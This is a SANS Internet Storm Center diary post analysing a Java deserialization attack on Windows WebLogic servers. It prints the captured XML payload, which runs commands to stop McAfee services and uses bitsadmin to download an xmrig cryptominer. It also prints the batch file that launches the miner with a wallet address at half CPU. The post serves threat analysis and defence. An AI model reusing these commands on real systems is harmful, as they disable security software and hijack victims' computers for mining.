Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Java Deserialization Attack Against Windows - Internet Security | DShield SANS ISC InfoSec Forums

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Java Deserialization Attack Against Windows

Recently we talked a lot about attacks exploiting Java deserialization vulnerabilties in systems like Apache SOLR and WebLogic. Most of these attacks targeted Linux/Unix systems. But recently, I am seeing more attacks that target windows. For example:

<soapenv:Envelope xmlns:soapenv="">
    <work:WorkContext xmlns:work="">
        <object class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3" >
            <void index="0">
            <void index="1">
            <void index="2">
              <string>net stop "McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground "%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground "%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;</string>
          <void method="start"/>

The actual payload:

Turn off McAfee Antivirus (I am not sure what they only turn off McAfee. Any ideas?)

net stop "McAfee McShield;
net stop mcafeeframework;

Use bitsadmin to download the cryptominer and a batch file to start it from GitHub

bitsadmin.exe /transfer "xmrig.bat" /download /priority foreground "%cd%\xmrig.bat";
bitsadmin.exe /transfer "xmrig.exe" /download /priority foreground "%cd%\xmrig.exe;
dir xmrig*;

The Batch file:

taskkill /im /f xmrig.exe /t
net stop "McAfee McShield"
net stop mcafeeframework
xmrig.exe -o -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6 -p x --background --max-cpu-usage=50 --donate-level=1

First, it kills other xmrig processes (competition?) . Next, it again turns of McAfee. It then starts the miner and connects to the pool on port 3333. It only uses 50% of the CPU usage, likely to evade detection.

So far, this miner only "owns" about 350 Hashes/Second, and made a bit short of 40 Monero so far (about $ 7,000) . 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

I will be teaching next: Intrusion Detection In-Depth - SIEM Summit & Training 2019


3630 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!